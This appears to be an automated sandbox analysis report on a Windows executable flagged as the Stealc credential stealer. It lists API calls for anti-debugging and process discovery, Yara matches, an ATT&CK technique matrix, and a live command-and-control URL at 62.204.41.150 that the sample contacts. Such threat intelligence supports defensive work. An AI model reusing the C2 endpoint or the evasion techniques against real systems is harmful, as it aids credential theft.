                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_00419750 mov eax, dword ptr fs:[00000030h]0_2_00419750
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_0085A403 push dword ptr fs:[00000030h]0_2_0085A403
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022E092B mov eax, dword ptr fs:[00000030h]0_2_022E092B
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022F99B7 mov eax, dword ptr fs:[00000030h]0_2_022F99B7
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022E0D90 mov eax, dword ptr fs:[00000030h]0_2_022E0D90
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_0041CEEA SetUnhandledExceptionFilter,0_2_0041CEEA
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B33A
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022FAFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_022FAFAF
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022FD151 SetUnhandledExceptionFilter,0_2_022FD151
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022FB5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_022FB5A1
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeMemory protected: page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: Process Memory Space: YLshJwBcrT.exe PID: 6780, type: MEMORYSTR
                    Searches for specific processes (likely to inject)
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022F9867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_022F9867
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417B90
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_022F7DF7
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00416920
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417A30
                    Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Stealc
                    Source: Yara matchFile source: 0.2.YLshJwBcrT.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.YLshJwBcrT.exe.2330000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.YLshJwBcrT.exe.400000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.YLshJwBcrT.exe.2330000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.YLshJwBcrT.exe.22e0e67.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.YLshJwBcrT.exe.22e0e67.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2342788236.000000000088A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2063251996.0000000002330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: YLshJwBcrT.exe PID: 6780, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP

                    Remote Access Functionality

                    barindex
                    Yara detected Stealc
                    Source: Yara matchFile source: 0.2.YLshJwBcrT.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.YLshJwBcrT.exe.2330000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.YLshJwBcrT.exe.400000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.YLshJwBcrT.exe.2330000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.YLshJwBcrT.exe.22e0e67.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.YLshJwBcrT.exe.22e0e67.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2342788236.000000000088A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2063251996.0000000002330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: YLshJwBcrT.exe PID: 6780, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		11
                    Process Injection                    		1
                    Masquerading                    		OS Credential Dumping2
                    System Time Discovery                    		Remote ServicesData from Local System1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts12
                    Native API                    		Boot or Logon Initialization Scripts1
                    DLL Side-Loading                    		11
                    Virtualization/Sandbox Evasion                    		LSASS Memory41
                    Security Software Discovery                    		Remote Desktop ProtocolData from Removable Media2
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                    Disable or Modify Tools                    		Security Account Manager11
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                    Process Injection                    		NTDS11
                    Process Discovery                    		Distributed Component Object ModelInput Capture12
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets1
                    Account Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                    Obfuscated Files or Information                    		Cached Domain Credentials1
                    System Owner/User Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                    Software Packing                    		DCSync1
                    File and Directory Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc Filesystem133
                    System Information Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    YLshJwBcrT.exe38%VirustotalBrowse
                    YLshJwBcrT.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://upx.sf.net0%URL Reputationsafe
                    http://62.204.41.150/edd20096ecef326d.php-6%VirustotalBrowse
                    http://62.204.41.150/9%VirustotalBrowse
                    http://62.204.41.150/edd20096ecef326d.php15%VirustotalBrowse
                    http://62.204.41.150/edd20096ecef326d.phpI6%VirustotalBrowse
                    http://62.204.41.1509%VirustotalBrowse
                    http://62.204.41.150/edd20096ecef326d.phpE6%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://62.204.41.150/trueunknown
                    http://62.204.41.150/edd20096ecef326d.phptrueunknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://62.204.41.150/edd20096ecef326d.phpSYLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008C4000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://62.204.41.150/edd20096ecef326d.phpQYLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008DA000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://62.204.41.1503YLshJwBcrT.exe, 00000000.00000002.2342721948.000000000084E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://62.204.41.150/edd20096ecef326d.php-YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008DA000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          http://62.204.41.150/edd20096ecef326d.phptYLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008BE000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://upx.sf.netAmcache.hve.4.drfalse
                            • URL Reputation: safe
                            		unknown
                            http://62.204.41.150YLshJwBcrT.exe, 00000000.00000002.2342788236.000000000088A000.00000004.00000020.00020000.00000000.sdmp, YLshJwBcrT.exe, 00000000.00000002.2342721948.000000000084E000.00000004.00000020.00020000.00000000.sdmptrueunknown
                            http://62.204.41.150/eYLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008C4000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown
                              http://62.204.41.150/edd20096ecef326d.phpIYLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008C4000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                              http://62.204.41.150/edd20096ecef326d.phpGYLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://62.204.41.150/edd20096ecef326d.phpEYLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008DA000.00000004.00000020.00020000.00000000.sdmpfalseunknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                62.204.41.150
                                		unknownUnited Kingdom
                                		30798TNNET-ASTNNetOyMainnetworkFItrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1528648
                                Start date and time:2024-10-08 07:20:11 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 5m 4s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:21
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:YLshJwBcrT.exe
                                renamed because original name is a hash value
                                Original Sample Name:015ac525cdf1038d8ceb75ba43068da0.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@8/29@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 23
                                • Number of non-executed functions: 166
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 4.175.87.197, 20.3.187.198, 52.165.164.15, 20.42.65.92
                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                • Report size exceeded maximum capacity and may have missing behavior information.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                01:21:32API Interceptor1x Sleep call for process: WerFault.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                62.204.41.150Qi517dNlNe.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150/edd20096ecef326d.php
                                M13W1o3scc.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150/edd20096ecef326d.php
                                100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150/edd20096ecef326d.php
                                MmcJhaiYNh.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150/edd20096ecef326d.php
                                XQywAEbb9e.exeGet hashmaliciousStealc, VidarBrowse
                                • 62.204.41.150/edd20096ecef326d.php
                                Aew8SXjXEb.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150/edd20096ecef326d.php
                                RJQySowVRb.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150/edd20096ecef326d.php
                                1f13Cs1ogc.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150/edd20096ecef326d.php
                                5rVhexjLCx.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150/edd20096ecef326d.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150/edd20096ecef326d.php

                                Domains

                                No context

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                TNNET-ASTNNetOyMainnetworkFIQi517dNlNe.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150
                                M13W1o3scc.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150
                                100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150
                                MmcJhaiYNh.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150
                                XQywAEbb9e.exeGet hashmaliciousStealc, VidarBrowse
                                • 62.204.41.150
                                Aew8SXjXEb.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150
                                RJQySowVRb.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150
                                1f13Cs1ogc.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150
                                5rVhexjLCx.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150
                                file.exeGet hashmaliciousStealcBrowse
                                • 62.204.41.150

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_YLshJwBcrT.exe_12885d2dcec36f491be32bdbb77a014a21804f_c3c1b60d_13641b0f-c065-4d0c-ba01-485637729b5d\Report.wer

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.8890531002900807
                                Encrypted:false
                                SSDEEP:96:XMhgMrssBhaoA7Rh6tQXIDcQnc6rCcEhcw3r7+HbHg/8BRTf3Oy1F/cIP2FUtZrH:2rs3056rQjuSZr+3zuiFFZ24IO8e
                                MD5:D5A1CA62919185797C8B941420EBD088
                                SHA1:9A78D37B9BFCE2B6232D18E4B8E7B7582029D7DB
                                SHA-256:42E0A44BF57F44212609B02C46F7E2FB7D3F5F290792894854B44D212A7A04A9
                                SHA-512:67B950ACD737D641421BC13AB6EB2638CC057080D25EF26700E35EBAD4FC43B2473738E9A36B9DAE7A9A8FBAAA191C9A75CB315428CEEA9B1CFC4493EF99B789
                                Malicious:true
                                Reputation:low
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.3.8.4.6.6.3.3.4.9.2.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.3.6.4.1.b.0.f.-.c.0.6.5.-.4.d.0.c.-.b.a.0.1.-.4.8.5.6.3.7.7.2.9.b.5.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.e.b.b.6.a.3.5.-.7.7.0.6.-.4.4.e.4.-.a.1.1.d.-.b.6.6.b.4.a.e.b.8.9.3.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.Y.L.s.h.J.w.B.c.r.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.7.c.-.0.0.0.1.-.0.0.1.4.-.f.b.b.5.-.a.5.d.d.4.1.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.d.4.7.0.f.5.0.1.2.0.3.7.2.e.2.b.9.2.7.a.5.2.d.e.2.0.a.2.1.f.0.0.0.0.f.f.f.f.!.0.0.0.0.d.c.2.8.8.5.1.e.6.a.0.2.c.5.6.7.d.f.e.a.b.c.d.3.d.6.4.2.f.0.6.f.5.f.5.6.9.d.5.e.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.3.:.4.1.:.5.0.!.0.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_YLshJwBcrT.exe_12885d2dcec36f491be32bdbb77a014a21804f_c3c1b60d_1b0316bc-655b-4c0e-b2b1-600653fef662\Report.wer

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.8893233814974209
                                Encrypted:false
                                SSDEEP:96:I4b1hgMZssBhaoA7Rh6tQXIDcQnc6rCcEhcw3r7+HbHg/8BRTf3Oy1F/cIP2FUt2:I2Zs3056rQjuSZr+3zuiFFZ24IO8e
                                MD5:34D7822FC8BD47720DC8440CF27E00FC
                                SHA1:6ED7F8B1DA537B6FB1F263396B3D9ED5FE6743B3
                                SHA-256:2C95F1103C0DF35660DE53E1C2D08A6C7756575F8BCD1F744F9C28A98DED11BF
                                SHA-512:17C9F97AB6E3A8D02B9D750F395CDEF0E394DF0659F810098A5BC39FC7E468A821F61AEF51A8E23B207C6F7BC5050727C3005B7BA24C6C0471518B0DF836BB23
                                Malicious:true
                                Reputation:low
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.3.8.4.6.8.0.9.8.8.5.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.b.0.3.1.6.b.c.-.6.5.5.b.-.4.c.0.e.-.b.2.b.1.-.6.0.0.6.5.3.f.e.f.6.6.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.c.f.a.b.7.0.e.-.8.5.2.4.-.4.7.e.0.-.9.b.2.5.-.0.a.0.e.8.c.6.4.b.b.3.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.Y.L.s.h.J.w.B.c.r.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.7.c.-.0.0.0.1.-.0.0.1.4.-.f.b.b.5.-.a.5.d.d.4.1.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.d.4.7.0.f.5.0.1.2.0.3.7.2.e.2.b.9.2.7.a.5.2.d.e.2.0.a.2.1.f.0.0.0.0.f.f.f.f.!.0.0.0.0.d.c.2.8.8.5.1.e.6.a.0.2.c.5.6.7.d.f.e.a.b.c.d.3.d.6.4.2.f.0.6.f.5.f.5.6.9.d.5.e.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.3.:.4.1.:.5.0.!.0.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_YLshJwBcrT.exe_12885d2dcec36f491be32bdbb77a014a21804f_c3c1b60d_9cdb16ee-371a-42ec-9589-4bd8b71984c9\Report.wer

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.8892365258043337
                                Encrypted:false
                                SSDEEP:96:hErLHAShgMqssBhaoA7Rh6tQXIDcQnc6rCcEhcw3r7+HbHg/8BRTf3Oy1F/cIP2U:agEqs3056rQjuSZr+3zuiFFZ24IO8e
                                MD5:02A1213BC63AF8DE462BE84358C66072
                                SHA1:CB6A5A826F766A999311CFA48BCD2D43739BBDA6
                                SHA-256:5680B79495132FA0B9D9EAE7034B4B189B386F7E7836A82A0055C4A6DAE83B2F
                                SHA-512:287EBF91AD64A5B4A44B6E1783CA2DEECB0C45804860FE160A5062872E568D80754492B39274920410C2000D9DA82B3AB8596950027EB4646605223B221EE1E1
                                Malicious:true
                                Reputation:low
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.3.8.4.6.5.5.2.5.2.4.3.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.c.d.b.1.6.e.e.-.3.7.1.a.-.4.2.e.c.-.9.5.8.9.-.4.b.d.8.b.7.1.9.8.4.c.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.8.7.0.a.c.6.-.e.d.d.e.-.4.b.6.7.-.8.e.a.c.-.f.3.e.b.3.7.d.8.9.5.b.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.Y.L.s.h.J.w.B.c.r.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.7.c.-.0.0.0.1.-.0.0.1.4.-.f.b.b.5.-.a.5.d.d.4.1.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.d.4.7.0.f.5.0.1.2.0.3.7.2.e.2.b.9.2.7.a.5.2.d.e.2.0.a.2.1.f.0.0.0.0.f.f.f.f.!.0.0.0.0.d.c.2.8.8.5.1.e.6.a.0.2.c.5.6.7.d.f.e.a.b.c.d.3.d.6.4.2.f.0.6.f.5.f.5.6.9.d.5.e.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.3.:.4.1.:.5.0.!.0.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_YLshJwBcrT.exe_12885d2dcec36f491be32bdbb77a014a21804f_c3c1b60d_dca337fc-e57a-4f16-9843-9b680bc1405c\Report.wer

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.911592997644169
                                Encrypted:false
                                SSDEEP:96:+81/hgMcssBhaoA7Rh6tQXIDcQnc6rCcEhcw3r7+HbHg/8BRTf3Oy1F/cIP2FUt8:dHcs3056rQjuSZr+duzuiFFZ24IO8e
                                MD5:4D0E311C2E0A0F3E22DF1C024A9DB9BC
                                SHA1:06BEAC9DBA475D35C0969CE0D763847406C6A0F7
                                SHA-256:1CDD663BAE4BE466EE95C150258DDA4FFE60FEA022783C89623EEB4C2B6EFBCC
                                SHA-512:426F07BB3DA4992F6C66ED622909DC46FB3E9167C169CBD131774C78C4EFDEF55A16EBF6CBF1F8178ECC1DC22DFA68D1201D1FAB1E6961C5908BEBFFC51B48DB
                                Malicious:true
                                Reputation:low
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.3.8.4.6.8.7.9.3.2.6.5.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.a.3.3.7.f.c.-.e.5.7.a.-.4.f.1.6.-.9.8.4.3.-.9.b.6.8.0.b.c.1.4.0.5.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.c.b.5.1.4.5.4.-.e.6.5.7.-.4.b.7.8.-.b.0.1.3.-.9.4.2.9.d.5.9.6.d.c.5.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.Y.L.s.h.J.w.B.c.r.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.7.c.-.0.0.0.1.-.0.0.1.4.-.f.b.b.5.-.a.5.d.d.4.1.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.d.4.7.0.f.5.0.1.2.0.3.7.2.e.2.b.9.2.7.a.5.2.d.e.2.0.a.2.1.f.0.0.0.0.f.f.f.f.!.0.0.0.0.d.c.2.8.8.5.1.e.6.a.0.2.c.5.6.7.d.f.e.a.b.c.d.3.d.6.4.2.f.0.6.f.5.f.5.6.9.d.5.e.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.3.:.4.1.:.5.0.!.0.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

